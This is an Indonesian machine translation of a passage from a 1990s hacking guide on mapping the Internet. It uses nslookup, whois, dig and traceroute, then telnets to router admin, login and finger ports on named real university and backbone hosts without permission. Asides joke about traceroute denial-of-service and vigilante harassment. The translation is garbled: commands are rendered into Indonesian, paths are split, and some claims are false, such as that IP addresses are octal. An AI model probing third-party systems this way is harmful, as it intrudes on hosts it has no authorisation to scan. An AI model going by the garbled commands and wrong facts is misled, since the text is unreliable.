menjalankan Unix. "Shell" adalah program yang menerjemahkan penekanan tombol Anda menjadi perintah Unix. Percayalah,
jika

Halaman 156
Anda seorang pemula, Anda akan menemukan bash (untuk Bourne lagi shell) yang paling mudah digunakan. Tanyakan dukungan
teknis pada Anda
ISP untuk akun shell yang diatur untuk menggunakan bash. Atau, Anda mungkin bisa mendapatkan bash shell hanya dengan
mengetik
kata "bash" di prompt. Jika ISP Anda tidak menawarkan akun shell, dapatkan ISP baru yang menawarkannya. Besar
buku tentang cara menggunakan bash shell adalah _Learning the Bash Shell_, oleh Cameron Newham dan Bill Rosenblatt,
diterbitkan oleh O'Reilly.
****************************
Jadi untuk ekspedisi pemetaan kita, mari kita mulai dengan mengunjungi Internet di Botswana! Wow, apakah Botswana masih
aktif
Internet? Itu adalah negara yang terkurung daratan yang indah di wilayah selatan Afrika, yang terkenal dengan peternakan,
berlian dan satwa liar yang melimpah. Bahasa perdagangan di Botswana adalah bahasa Inggris, jadi ada baiknya
kemungkinan kami dapat memahami pesan dari komputer mereka.
Langkah pertama kami dalam mempelajari host Internet Botswana adalah menggunakan program Unix nslookup.
****************************
Kiat jenius jahat: Nslookup adalah salah satu alat pemetaan Internet paling kuat yang ada. Kami sulit melakukannya
itu keadilan di sini. Jika Anda ingin mempelajari cara menjelajah hingga maksimal, dapatkan buku _DNS dan BIND_ oleh Paul
Albitz
dan Cricket Liu, diterbitkan oleh O'Reilly, edisi 1997.
*****************************
Langkah pertama mungkin untuk menemukan di mana ISP Anda telah menyembunyikan program dengan menggunakan perintah
“whereis
nslookup. "(Atau komputer Anda dapat menggunakan perintah" find ".) Aha - itu dia! Saya memberi perintah:
-> / usr / etc / nslookup
Server Default: swcp.com
Alamat: 198.59.115.2
>
Dua baris ini dan prompt yang sedikit berbeda (ini bukan panah lagi) memberi tahu saya bahwa ISP lokal saya
menjalankan program ini untuk saya. (Dimungkinkan untuk menjalankan nslookup di komputer lain dari komputer Anda.)
Sekarang kita masuk
program, jadi saya harus ingat bahwa perintah bash saya tidak berfungsi lagi. Langkah selanjutnya adalah memberi tahu
program yang kami ingin tahu komputer apa yang menangani nama domain yang diberikan.
> set type = ns
Selanjutnya kita perlu tahu nama domain untuk Botswana. Untuk melakukan itu saya mencari daftar domain tingkat atas
nama pada halaman 379 edisi 1997 _DNS dan BIND_. Untuk Botswana itu bw. Jadi saya masukkan di
cepat, mengingat - ini SANGAT penting - untuk menempatkan titik setelah nama domain:
> bw.
Server: swcp.com
Alamat: 198.59.115.2
Jawaban tidak resmi:
Hal “jawaban tidak otoritatif” ini memberi tahu saya bahwa informasi ini telah disimpan untuk sementara waktu, begitulah
adanya
mungkin, tetapi tidak mungkin, bahwa informasi di bawah ini telah berubah.
bw nameserver = DAISY.EE.UND.AC.ZA
bw nameserver = RAIN.PSG.COM
bw nameserver = NS.UU.NET
bw nameserver = HIPPO.RU.AC.ZA
Jawaban resmi dapat ditemukan dari:
Alamat inet DAISY.EE.UND.AC.ZA = 146.230.192.18

Halaman 157
Alamat inet RAIN.PSG.COM = 147.28.0.34
Alamat inet NS.UU.NET = 137.39.1.3
Alamat inet HIPPO.RU.AC.ZA = 146.231.128.1
Saya mencari nama domain "za" dan menemukan itu singkatan dari Afrika Selatan. Ini memberitahu saya bahwa Internet ada di
masa kanak-kanak di Botswana - tidak ada server nama di sana - tetapi harus baik di Afrika Selatan. Lihat semua itu
server nama!
*************************
Catatan pemula: server nama adalah program komputer yang menyimpan data pada Sistem Nama Domain. Itu
Sistem Nama Domain memastikan tidak ada dua komputer yang memiliki nama yang sama. Ini juga menyimpan informasi
tentang
cara menemukan komputer lain. Ketika berbagai server nama dapat berbicara satu sama lain, mereka akhirnya,
biasanya dalam hitungan detik, dapat mengetahui rute ke salah satu dari jutaan komputer di Internet.
*************************
Nah, yang saya tahu adalah orang-orang yang ingin memasang komputer host Internet di Botswana biasanya mengandalkan
pada komputer di Afrika Selatan untuk menghubungkan mereka. Mari belajar lebih banyak tentang Afrika Selatan. Karena kita
masih di
program nslookup, saya memerintahkannya untuk memberi tahu saya apa komputer server nama untuk Afrika Selatan:
> za.
Server: swcp.com
Alamat: 198.59.115.2
Jawaban tidak resmi:
za nameserver = DAISY.EE.UND.AC.za
za nameserver = UCTHPX.UCT.AC.za
za nameserver = HIPPO.RU.AC.za
za nameserver = RAIN.PSG.COM
za nameserver = MUNNARI.OZ.AU
za nameserver = NS.EU.NET
za nameserver = NS.UU.NET
za nameserver = UUCP-GW-1.PA.DEC.COM
za nameserver = APIES.FRD.AC.za
Jawaban resmi dapat ditemukan dari:
Alamat inet DAISY.EE.UND.AC.za = 146.230.192.18
Alamat inet UCTHPX.UCT.AC.za = 137.158.128.1
Alamat inet HIPPO.RU.AC.za = 146.231.128.1
Alamat inet RAIN.PSG.COM = 147.28.0.34
Alamat inet MUNNARI.OZ.AU = 128.250.22.2
Alamat inet MUNNARI.OZ.AU = 128.250.1.21
Alamat inet NS.EU.NET = 192.16.202.11
Alamat inet UUCP-GW-1.PA.DEC.COM = 204.123.2.18
Alamat inet UUCP-GW-1.PA.DEC.COM = 16.1.0.18
Alamat inet APIES.FRD.AC.za = 137.214.80.1
*************************
Catatan pemula: Apa artinya alamat inet = 137.214.80.1 seharusnya artinya? Itu nama komputer di Internet
Internet (inet) - dalam hal ini APIES.FRD.AC - dalam oktal. Oktal seperti angka biasa kecuali dalam basis 8 lebih tepatnya
dari base 10. Semua nama komputer di Internet harus diubah menjadi angka sehingga komputer lain
bisa memahaminya.
**********************
Aha! Beberapa server nama tersebut berlokasi di luar Afrika Selatan. Kami melihat komputer di Australia (au) dan
AS (domain com). Selanjutnya, kita keluar dari program nslookup dengan perintah ^ D. Itu dibuat dengan memegang

Halaman 158
ke bawah tombol kontrol sambil menekan tombol "d" kecil. Sangat SANGAT PENTING untuk keluar dari nslookup dengan cara
ini dan
tidak dengan ^ C.
Selanjutnya, kami mengambil salah satu server nama di Afrika Selatan dan bertanya:
-> whois HIPPO.RU.AC.ZA
[Tidak ada nama] (HIPPO)
Hostname: HIPPO.RU.AC.ZA
Alamat: 146.231.128.1
Sistem: SUN menjalankan SUNOS
Server Domain
Rekam terakhir diperbarui pada 24-Feb-92.
Untuk melihat catatan host ini dengan pengguna terdaftar, ulangi perintah dengan tanda bintang ('*') sebelum nama; atau,
gunakan
'%' untuk menunjukkan HANYA pengguna terdaftar.
Host Layanan Pendaftaran InterNIC berisi HANYA Informasi Internet (Jaringan, ASN, Domain,
dan POC).
Silakan gunakan server whois di nic.ddn.mil untuk Informasi MILNET.
Kewl! Ini memberitahu kita apa jenis komputer itu - Matahari - dan sistem operasi, Sun OS.
Sekarang, hanya untuk variasi, saya menggunakan perintah whois dengan alamat numerik dari salah satu server nama. Ini
tidak selalu memberikan kembali nama teks, tetapi terkadang berhasil. Dan, voila, kita dapatkan:
-> whois 146.230.192.18
[Tidak ada nama] (DAISY1)
Hostname: DAISY.EE.UND.AC.ZA
Alamat: 146.230.192.18
Sistem: HP-9000 menjalankan HP-UX
Server Domain
Rekam terakhir diperbarui pada 14-Sep-94.
Ah, tapi semua yang dilakukan sejauh ini hanya memberi tahu kami info tentang siapa server nama untuk siapa. Sekarang
bagaimana
langsung memetakan rute dari komputer saya ke Afrika Selatan? Untuk itu kita akan menggunakan perintah traceroute.
************************
Kiat Netiquette: Program traceroute dimaksudkan untuk digunakan dalam pengujian jaringan, pengukuran dan
pengelolaan. Ini harus digunakan terutama untuk isolasi kesalahan manual, seperti saat saya tidak dapat mengirim email ke teman
saya
Irlandia Utara. Karena beban yang dapat dikenakan pada jaringan, tidak bijaksana untuk menggunakan traceroute dari
skrip otomatis yang dapat menyebabkan program mengirimkan sejumlah besar pertanyaan. Gunakan terlalu banyak
dan ISP Anda mungkin mulai mengajukan beberapa pertanyaan tajam kepada Anda.
************************
************************
ANDA BISA PERGI KE PERINGATAN JAIL: Jika Anda baru saja mendapat ide tentang bagaimana menggunakan traceroute
untuk penolakan
serangan layanan, jangan panggil jurnalis favorit Anda dan katakan padanya bahwa Anda merencanakan penolakan layanan
serangan terhadap ISP yang melayani orang-orang terkenal seperti Bill Clinton dan Carolyn Meinel! :-) Jangan menulis itu

Halaman 159
naskah. Jangan gunakan itu. Jika Anda melakukannya, saya akan memberikan wawancara lain ke majalah PC World
(http://www.pcworld.com/news/newsradio/meinel/index.html) tentang bagaimana anak berusia tiga tahun dapat menjalankan
menyerang. Dan jika Anda ketahuan, kami semua akan menertawakan Anda saat Anda dirantai saat menjadi jurnalis Anda
teman mendapat uang muka $ 250 ribu untuk transaksi bukunya tentang Anda.
************************
Saya memberi perintah:
-> dimana traceroute
traceroute: / usr / local / bin / traceroute
Oke, sekarang kami siap memetakan dengan sungguh-sungguh. Saya memberi perintah:
-> / usr / local / bin / traceroute DAISY.EE.UND.AC.ZA
Dan jawabannya adalah:
traceroute ke DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hop maksimal, paket 40 byte
1 sisko (198.59.115.1) 3 ms 4 ms 4 ms
2 glory-cyberport.nm.westnet.net (204.134.78.33) 47 ms 8 ms 4 ms
3 ENSS365.NM.ORG (129.121.1.3) 5 ms 10 ms 7 ms
4 h4-0.cnss116.Albuquerque.t3.ans.net (192.103.74.45) 17 ms 41 ms 28 ms
5 f2.t112-0.Albuquerque.t3.ans.net (140.222.112.221) 7 ms 6 ms 5 ms
6 h14.t16-0.Los-Angeles.t3.ans.net (140.223.17.9) 31 ms 39 ms 84 ms
7 h14.t8-0.San-Francisco.t3.ans.net (140.223.9.13) 67 ms 43 ms 68 ms
8 enss220.t3.ans.net (140.223.9.22) 73 ms 58 ms 54 ms
9 sl-mae-w-F0 / 0.sprintlink.net (198.32.136.11) 97 ms 319 ms 110 ms
10 sl-stk-1-H11 / 0-T3.sprintlink.net (144.228.10.109) 313 ms 479 ms 473 ms
11 sl-stk-2-F / T.sprintlink.net (198.67.6.2) 179 ms * *
12 sl-dc-7-H4 / 0-T3.sprintlink.net (144.228.10.106) 164 ms * 176 ms
13 sl-dc-7-F / T.sprintlink.net (198.67.0.1) 143 ms 129 ms 134 ms
14 gsl-dc-3-Fddi0 / 0.gsl.net (204.59.144.197) 135 ms 152 ms 130 ms
15 204.59.225.66 (204.59.225.66) 583 ms 545 ms 565 ms
16 * * *
17 e0.csir00.uni.net.za (155.232.249.1) 516 ms 436 ms 400 ms
18 s1.und00.uni.net.za (155.232.70.1) 424 ms 485 ms 492 ms
19 e0.und01.uni.net.za (155.232.190.2) 509 ms 530 ms 459 ms
20 s0.und02.uni.net.za (155.232.82.2) 650 ms * 548 ms
21 Gw-Uninet1.CC.und.ac.za (146.230.196.1) 881 ms 517 ms 478 ms
22 cisco-unp.und.ac.za (146.230.128.8) 498 ms 545 ms *
23 IN.ee.und.ac.za (146.230.192.18) 573 ms 585 ms 493 ms
Jadi apa artinya semua ini?
Nomor di depan setiap baris adalah jumlah lompatan sejak meninggalkan komputer yang memiliki akun shell
Saya menggunakan.
Entri kedua adalah nama komputer yang dilaluinya rute ini, pertama dalam teks, dan kemudian dalam
kurung representasi numeriknya.
Angka-angka setelah itu adalah waktu dalam milidetik yang diperlukan untuk membuat masing-masing dari tiga paket probe
hop itu. Ketika * muncul, waktu untuk hop habis. Dalam hal perintah traceroute ini, ada
waktu lebih dari 3 detik menyebabkan * dicetak.

Halaman 160
Bagaimana dengan hop 16? Itu memberi kami info apa pun. Gateway diam itu mungkin merupakan hasil dari bug di 4.1,
4.2 atau 4.3BSD Unix kode jaringan. Komputer yang menjalankan salah satu dari sistem operasi ini mengirimkan
"Tidak terjangkau" ssage saya. Atau bisa juga yang lain. Maaf, saya belum cukup jenius untuk mencari tahu
ini pasti. Apakah kita memiliki phun?
************************
Tip jenius jahat: Jika Anda ingin mendapatkan detail yang benar-benar menyiksa pada perintah traceroute, saat berada di
ketik akun shell dalam perintah:
-> man traceroute
Saya berjanji, barang-barang manual on-line sering ditulis dengan cara yang lucu dan menghibur. Terutama manual Sun OS.
Jujur!
************************
************************
Catatan untuk akun shell-tertantang: Jika Anda memiliki Windows 95, Anda bisa mendapatkan hasil yang sama - maksud saya,
untuk
memetakan Internet, tidak akan masuk penjara - menggunakan perintah "tracert". Begini cara kerjanya:
1. Buka koneksi PPP. Misalnya, jika Anda menggunakan Compuserve atau AOL, buat koneksi, lalu perkecil
program akses online Anda.
2. Klik pada menu Start.
3. Buka jendela DOS.
4. Pada DOS prompt ketik "tracert <distant.computer.com> di mana" distant.computer.com "diganti oleh
nama komputer yang ingin Anda lacak rute. Tekan tombol Enter.
5. Bersabarlah. Terutama jika Anda melacak rute ke komputer yang jauh, perlu beberapa saat untuk membuat semua itu
koneksi. Setiap kali komputer Anda terhubung ke komputer lain di Internet, pertama-tama ia harus melacak a
rute ke komputer lain. Itu sebabnya terkadang browser Anda butuh waktu lama untuk memulai
mengunduh halaman Web.
6. Jika Anda memutuskan untuk menggunakan Windows untuk pelajaran peretasan ini, Damien Sorder memiliki pesan untuk
kami: "JANGAN
Dorong mereka untuk menggunakan WIN95! @ # $! @ #! ”Dia benar, tetapi karena sebagian besar dari Anda membaca ini
menyetujui orang dewasa, saya pikir ini adalah pemakaman Anda jika Anda menggunakan Windows hacking pada koneksi AOL
PPP!
*************************
Sekarang ini semakin menarik. Kita tahu bahwa Daisy terhubung langsung ke setidaknya satu komputer lain,
dan komputer itu pada gilirannya terhubung ke cisco-unp.und.ac.za. Mari kita pelajari sedikit tentang ini
cisco-unp.und.ac.za, oke?
Pertama, kita bisa menebak dari nama yang merupakan router Cisco. Bahkan, lompatan pertama dalam rute ini adalah ke
komputer
bernama "sisco," yang juga mungkin merupakan router Cisco. Karena 85% dari router di dunia adalah Ciscos,
itu taruhan yang cukup aman. Tapi kita tidak hanya akan memastikan cisco-unp.und.ac.za adalah Cisco. Kita juga
akan mencari tahu nomor model, dan beberapa barang lainnya.
Pertama, kami mencoba whois:
-> whois cisco-unp.und.ac.za
Tidak cocok untuk "CISCO-UNP.UND.AC.ZA".
Host Layanan Pendaftaran InterNIC berisi HANYA Informasi Internet
(Jaringan, ASN, Domain, dan POC).
Silakan gunakan server whois di nic.ddn.mil untuk Informasi MILNET.

Halaman 161
Hah? Traceroute memberi tahu kami cisco-unp.und.ac.za ada, tetapi whois tidak dapat menemukannya! Sebenarnya ini adalah
hal biasa
masalah, terutama mencoba menggunakan whois pada komputer yang jauh. Apa yang kita lakukan selanjutnya? Nah, jika Anda
beruntung,
perintah whereis akan mengaktifkan program lain yang sangat keren: gali!
**********************
Catatan pemula: Dig singkatan dari "domain informasi groper." Ia melakukan banyak hal yang sama seperti nslookup. Tapi
menggali adalah program yang jauh lebih tua, dalam banyak hal lebih sulit digunakan daripada nslookup. Untuk detail tentang
penggalian, gunakan
perintah dari akun shell Anda “man dig.”
**********************
Bahkan, pada akun shell saya, saya menemukan saya bisa langsung menggali dari bash prompt saya:
-> gali CISCO-UNP.UND.AC.ZA
; << >> DiG 2.0 << >> CISCO-UNP.UND.AC.ZA
;; opsi res: init berulang kali dinamai dnsrch
;; mendapat jawaban:
;; - >> HEADER << - opcode: QUERY, status: NOERROR, id: 6
;; bendera: qr aa rd ra; Pertanyaan: 1, Ans: 4, Auth: 5, Addit: 5
;; PERTANYAAN:
;; CISCO-UNP.UND.AC.ZA, type = A, class = IN
;; JAWABAN:
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.248.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.12.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.60.1
CISCO-UNP.UND.AC.ZA. 86400 A 146.230.128.8
;; RECORDS OTORITAS:
und.ac.za. 86400 NS Eagle.und.ac.za.
und.ac.za. 86400 NS Shrike.und.ac.za.
und.ac.za. 86400 NS ucthpx.uct.ac.za.
und.ac.za. 86400 NS hiPPo.ru.ac.za.
und.ac.za. 86400 NS Rain.psg.com.
;; CATATAN TAMBAHAN:
Eagle.und.ac.za. 86400 A 146.230.128.15
Shrike.und.ac.za. 86400 A 146.230.128.13
ucthpx.uct.ac.za. 86400 A 137.158.128.1
hiPPo.ru.ac.za. 86400 A 146.231.128.1
Rain.psg.com. 14400 A 147.28.0.34
;; Total waktu permintaan: 516 msec
;; DARI: llama ke SERVER: default - 198.59.115.2
;; KAPAN: Jum 17 Jan 13:03:49 1997
;; MSG SIZE terkirim: 37 rcvd: 305
Ahhh, bagus. Beberapa baris pertama, yang didahului oleh ;; tanda, sebagian besar memberi tahu apa pengaturan default
perintah dan apa yang kita tanyakan. Baris “Ques: 1, Ans: 4, Auth: 5, Addit: 5” memberi tahu kita berapa banyak item
kami akan membahas setiap topik pertanyaan, jawaban, catatan otoritas, dan catatan tambahan. (Kamu akan mendapatkan
nomor yang berbeda pada baris itu dengan pertanyaan yang berbeda.) "Catatan" ini merujuk pada informasi yang disimpan di
bawah
sistem nama domain.

Halaman 162
Kami belajar dari penggalian adalah bahwa CLASS = IN, artinya CISCO-UNP.UND.AC.ZA adalah nama domain di dalam
Internet. Tapi kami sudah tahu itu . Hal pertama yang benar-benar * baru * yang kami pelajari adalah bahwa empat router
semuanya berbagi
nama domain yang sama. Kami dapat mengatakan itu karena nomor Internet numerik mereka berbeda. Yang sebaliknya bisa
juga terjadi: beberapa nama domain semuanya dapat milik alamat numerik yang sama. Jika Anda menggunakan penggalian
perintah pada setiap tautan di rute ke DAISY.EE.UND.AC.ZA, Anda akan menemukan variasi yang luar biasa dalam apakah
router memetakan ke nama domain yang sama atau berbeda. Sebagai peretas, kami ingin mengetahui semua variasi ini di
bagaimana nama domain dikaitkan dengan kotak.
Tetapi kita masih dapat belajar lebih banyak lagi tentang router Cisco yang bernama CISCO-UNP.UND.AC.ZA. Kita kembali ke
nslookup dan jalankan dalam mode interaktif:
-> / usr / etc / nslookup
Server Default: swcp.com
Alamat: 198.59.115.2
>
Sekarang mari kita lakukan sesuatu yang baru dengan nslookup. Ini adalah perintah yang sangat berguna ketika
kami bermain main hakim sendiri dan perlu menganiaya seorang spammer atau menghancurkan satu atau dua situs web porno
anak. Begini caranya
kita bisa mendapatkan alamat email untuk sysadmin komputer host Internet.
> set type = soa
Kemudian saya memasukkan nama komputer yang saya ingin tahu. Perhatikan bahwa saya meletakkan titik setelah akhir
nama tuan rumah. Seringkali membantu melakukan ini dengan nslookup:
> CISCO-UNP.UND.AC.ZA.
Server: swcp.com
Alamat: 198.59.115.2
*** Tidak ada informasi zona otoritas awal yang tersedia untuk CISCO-UNP.UND.AC.ZA.
Sekarang apa yang aku lakukan? Menyerah? Tidak, saya seorang hacker wannabe, kan? Jadi saya mencoba memasukkan hanya
sebagian dari nama domain,
lagi-lagi mengingat untuk menempatkan titik di akhir:
> und.ac.za.
Server: swcp.com
Alamat: 198.59.115.2
asal und.ac.za = Eagle.und.ac.za
mail addr = postmaster.und.ac.za
serial = 199610255, refresh = 10800, coba lagi = 3600, kedaluwarsa = 3000000, min = 86400
Alamat inet Eagle.und.ac.za = 146.230.128.15
Alamat inet Shrike.und.ac.za = 146.230.128.13
alamat inet ucthpx.uct.ac.za = 137.158.128.1
alamat inet hiPPo.ru.ac.za = 146.231.128.1
Alamat inet Rain.psg.com = 147.28.0.34
Bingo!!! Saya mendapat alamat email dari sysadmin yang domainnya termasuk router Cisco, DAN IP
alamat beberapa kotak lain yang dia kelola. Tapi perhatikan itu tidak mencantumkan router mana pun yang
sysadmin pasti tahu satu atau dua hal tentang.
Tapi kami belum selesai dengan cisco-unp.und.ac.za (146.230.128.8). Tentu saja kami memiliki tebakan yang cukup bagus
itu adalah router Cisco. Tapi mengapa berhenti hanya dengan menebak kapan kita bisa port surfing? Jadi kita kembali pada teman
kita
program telnet dan menuju port 2001:
Halaman 163
-> telnet 146.230.128.8 2001
Mencoba 146.230.128.8 ...
Terhubung ke 146.230.128.8.
Karakter melarikan diri adalah '^]'.
C
************************************************ **
*** Selamat datang di Universitas Natal
***
***
***
*** Model: Cisco 4500 dengan ATM dan 8 port BRI
***
***
***
*** Data Dimensi Durban - 031-838333
***
***
***
************************************************ *
Hei, kita tahu sekarang bahwa ini adalah model Cisco 4500 yang dimiliki oleh Universitas Natal, dan kami bahkan mendapat
nomor telepon untuk sysadmin. Dari sini kita juga dapat menyimpulkan bahwa router ini menangani subnet yang berfungsi
U Natal dan termasuk bunga aster.
Tapi mengapa saya telnet ke port 2001? Ini umum digunakan di antara router sebagai port administrasi. Bagaimana saya
tahu bahwa? Dari RFC (permintaan komentar) yang mencakup semua tugas pelabuhan yang umum digunakan. Kamu bisa
temukan salinan RFC ini di http://ds2.internic.net/rfc/rfc1700.txt. Baca dan Anda akan berada di pelabuhan bahagia
berselancar!
************************
Kiat Genius Jahat: ada banyak port yang digunakan oleh router Cisco:
cisco-fna 130 / tcp cisco FNATIVE
cisco-tna 131 / tcp cisco TNATIVE
cisco-sys 132 / tcp cisco SYSMAINT
lisensiedaemon 1986 / tcp manajemen lisensi cisco
tr-rsrb-p1 1987 / tcp cisco RSRB Port prioritas 1
tr-rsrb-p2 port 1988 / tcp cisco RSRB Prioritas 2
tr-rsrb-p3 1989 / tcp cisco RSRB Prioritas 3 port
stun-p1 1990 / tcp cisco STUN Prioritas 1 port
stun-p2 1991 / tcp cisco STUN Port prioritas 2
stun-p3 1992 / tcp cisco STUN Prioritas 3 port
snmp-tcp-port 1993 / tcp cisco port SNMP TCP
stun-port 1994 / tcp cisco port tunnel serial
perf-port 1995 / tcp port cisco perf
tr-rsrb-port 1996 / tcp cisco Port SRB jarak jauh
gdp-port 1997 / tcp cisco Gateway Discovery Protocol
x25-svc-port 1998 / tcp cisco X.25 service (XOT)
tcp-id-port 1999 / tcp port identifikasi cisco
************************
Tetapi bagaimana dengan port telnet “normal”, yaitu 23? Karena ini adalah port "normal", yang biasanya Anda kunjungi
ketika Anda ingin masuk, kami tidak perlu meletakkan 23 setelah nama host:
-> telnet 146.230.128.8
Mencoba 146.230.128.8 ...
Terhubung ke 146.230.128.8.
Karakter melarikan diri adalah '^]'.
C
************************************************ *************************
*** Selamat datang di Universitas Natal
***

Halaman 164
***
***
*** Model: Cisco 4500 dengan ATM dan 8 port BRI
***
***
***
*** Data Dimensi Durban - 031-838333
***
***
***
************************************************ *************************
Verifikasi Akses Pengguna
Kata sandi:
Hai, ini menarik, tidak ada nama pengguna yang diminta, hanya kata sandi. Jika saya sysadmin, saya akan membuatnya sedikit
lebih sulit untuk login. Hmmm, apa yang terjadi jika saya mencoba port surf jari situs itu? Itu berarti telnet ke jari
port, yaitu 79:
-> telnet 146.230.128.8 79
Mencoba 146.230.128.8 ...
Terhubung ke 146.230.128.8.
Karakter melarikan diri adalah '^]'.
C
************************************************ *************************
*** Selamat datang di Universitas Natal
***
***
***
*** Model: Cisco 4500 dengan ATM dan 8 port BRI
***
***
***
*** Data Dimensi Durban - 031-838333
***
***
***
************************************************ *************************
Host Pengguna Baris
Lokasi Idle
* 2 vty 0
diam
0 kitsune.swcp.com
BR0: 2
Sinkronkan PPP
00:00:00
BR0: 1
Sinkronkan PPP
00:00:00
BR1: 2
Sinkronkan PPP
00:00:00
BR1: 1
Sinkronkan PPP
00:00:00
BR2: 2
Sinkronkan PPP
00:00:01
BR2: 1
Sinkronkan PPP
00:00:00
BR5: 1
Sinkronkan PPP
00:00:00
Koneksi ditutup oleh tuan rumah asing.
Perhatikan bahwa jari mencantumkan koneksi ke komputer tempat saya berselancar dari port: kitsune. Tapi tidak ada orang lain
sepertinya sedang on line sekarang. Harap ingat, ketika Anda port surfing, kecuali Anda tahu bagaimana melakukan IP spoofing,
komputer target Anda tahu dari mana Anda berasal. Tentu saja saya akan menjadi tamu yang sopan.
Sekarang mari kita coba yang sudah jelas. Mari telnet ke port login daisy. Saya menggunakan alamat numerik hanya untuk
sih itu:
-> telnet 146.230.192.18
Mencoba 146.230.192.18 ...
Terhubung ke 146.230.192.18.
Karakter melarikan diri adalah '^]'.
NetBSD / i386 (daisy.ee.und.ac.za) (ttyp0)
masuk:

Halaman 165
Hei, ini menarik. Karena kita sekarang tahu ini adalah universitas, itu mungkin teknik listrik
(EE) departemen. Dan NetBSD adalah Unix freeware yang berjalan di PC! Mungkin kotak 80386.
Mendapatkan info ini membuat saya hampir merasa seperti sedang nongkrong di lab komputer Universitas Natal EE.
Kedengarannya seperti tempat yang ramah. Dilihat dari router mereka, keamanan agak longgar, mereka menggunakan yang
murah
komputer, dan pesannya ramah. Mari kita lihat siapa yang masuk sekarang:
Karena saya sudah berada di program telnet (saya bisa tahu dari prompt "telnet>"), saya pergi ke daisy menggunakan "open"
perintah:
telnet> buka daisy.ee.und.ac.za 79
Mencoba 146.230.192.18 ...
telnet: terhubung: Sambungan ditolak
telnet> keluar
Ya, itu tidak berhasil, jadi saya keluar dari telnet dan mencoba program jari di komputer akun shell saya:
-> jari @ daisy.ee.und.ac.za
[daisy.ee.und.ac.za]
jari: daisy.ee.und.ac.za: Koneksi ditolak
Mendesah. Sulit menemukan port jari yang terbuka lagi. Tapi ini adalah praktik keamanan yang baik untuk menutup jari. Damien
Sorder menunjukkan, “Jika Anda menginstal distribusi Linux yang baru, ia datang dengan Cfingerd. Mengapa saya (dan
lainnya) ingin mematikannya? Bukan karena peretas dan penyalahgunaan atau sesuatu yang bodoh seperti itu. Karena itu
memberikan terlalu banyak informasi ketika Anda menyentuh satu pengguna. Anda mendapatkan beban mesin dan semua
pengguna
informasi."
Saya berhasil mendapatkan sedikit info lebih lanjut tentang cara memetakan interkoneksi komputer Universitas Natal
dengan pencarian di Web menggunakan http://digital.altavista.com. Itu menautkan saya ke situs
http://www.frd.ac.za/uninet/sprint.html, yang berjudul "Lalu Lintas di Tautan UNINET -SPRINTLINK."
Namun, semua tautan ke statistik traffic netwrok dari situs itu sudah mati.
Selanjutnya, mari kita lihat nomor 20 pada traceroute yang membawa kita ke Universitas Natal. Kamu bisa sangat banyak
berharap bahwa tautan di tengah traceroute panjang akan menjadi komputer besar yang dimiliki oleh perusahaan besar
yang membentuk tulang punggung Internet.
-> telnet 155.232.82.2 2001
Mencoba 155.232.82.2 ...
Terhubung ke 155.232.82.2.
Karakter melarikan diri adalah '^]'.
Id: und02
Hanya Pengguna Resmi!
------------------------
Verifikasi Akses Pengguna
Nama pengguna:
Yup, kita keluar dari wilayah persahabatan sekarang. Dan karena port 2001 berfungsi, itu mungkin sebuah router. Hanya untuk
tertawa,
namun, mari kembali ke port telnet default:

Halaman 166
-> telnet 155.232.82.2
Mencoba 155.232.82.2 ...
Terhubung ke 155.232.82.2.
Karakter melarikan diri adalah '^]'.
Id: und02
Hanya Pengguna Resmi!
------------------------
Verifikasi Akses Pengguna
Nama pengguna:
Sekarang mungkin saja komputer tipe backbone ini akan memberi tahu kita banyak hal tentang semua komputer itu
terhubung dengan. Kami mencoba telneting ke port netstat, 15. Ini, jika terbuka untuk umum, akan memberi tahu kami
semua tentang komputer yang terhubung melalui itu:
-> telnet 155.232.82.2 15
Mencoba 155.232.82.2 ...
telnet: terhubung: Sambungan ditolak
Mendesah. Saya memberi contoh kekayaan informasi yang luar biasa yang bisa Anda dapatkan dari netstat di GTMHH
berselancar di pelabuhan. Tetapi setiap hari lebih sulit untuk menemukan port netstat publik. Itu karena informasi netstat
memberi sangat berguna bagi penjahat komputer. Bahkan, port 15 tidak lagi dicadangkan sebagai port netstat (pada tahun 1994,
menurut RFC). Jadi, Anda akan menemukan beberapa kotak menggunakannya.
******************************
Catatan pemula: ingin tahu penugasan port apa yang digunakan ISP Anda? Sorder menunjukkan sebagian besar “/ etc / services
mesin akan [memberi tahu Anda ini]. "
Bagaimana Anda bisa membaca informasi itu? Coba ini:
Pertama, ubah ke direktori / etc /:
-> cd / etc
Kemudian perintahkan untuk mencetaknya ke layar Anda dengan:
-> lebih banyak layanan
#
# @ (#) layanan 1.16 90/01/03 SMI
#
# Layanan jaringan, gaya internet
# File ini tidak pernah dikonsultasikan ketika NIS sedang berjalan
#
tcpmux 1 / tcp
# rfc-1078
gema
7 / tcp
... dan seterusnya...
Sayangnya, hanya karena akun shell Anda memiliki daftar penetapan port tidak berarti mereka benar-benar digunakan. Saya t
juga mungkin tidak akan mencantumkan layanan khusus seperti semua penugasan port router Cisco.
***************************

Halaman 167
Bahkan, setelah berselancar sekitar dua lusin port netstat yang dipilih secara acak, satu-satunya jawaban yang saya dapatkan
dari "Sambungan ditolak" adalah:
-> telnet ns.nmia.com 15
Mencoba 198.59.166.10 ...
Terhubung ke ns.nmia.com.
Karakter melarikan diri adalah '^]'.
Ya, tetapi apakah saya akan melihat EASTER BUNNY dengan skintight leather
di konser IRON MAIDEN?
Sekarang bagaimana dengan semua router Sprintlink di traceroute itu? Itu adalah tulang punggung Internet utama yang berbasis
di
AS disediakan oleh Sprint. Anda dapat memperoleh beberapa informasi tentang topologi tulang punggung Sprintlink di
http://www.sprintlink.net/SPLK/HB21.html#2.2. Sayangnya, Sprintlink digunakan untuk memberikan lebih banyak informasi
daripada yang mereka lakukan hari ini. Yang bisa saya ambil di situs Web mereka hari ini cukup kabur.
Mendesah. Internet semakin tidak ramah, tetapi lebih aman. Suatu hari ketika kita benar-benar kuno, katakan lima
bertahun-tahun dari sekarang, kami akan memberi tahu orang-orang, “Ya, saya ingat kapan kami bisa berselancar! Kenapa, dulu
ada
zillions port terbuka dan orang-orang dapat memilih kata sandi APAPUN yang mereka inginkan. Hmph! Hari ini hanya firewall
di mana-mana Anda melihat! "Menambahkan Sorder," Wah. Menurut Anda bagaimana perasaan orang-orang seperti saya ..
berselancar di pelabuhan selama lebih dari 6 tahun
lalu. "
Terima kasih kami kepada Damien Sorder (jericho@dimensional.com) atas bantuannya dalam meninjau dan berkontribusi pada
ini
GTMHH.
___________________________________________________________
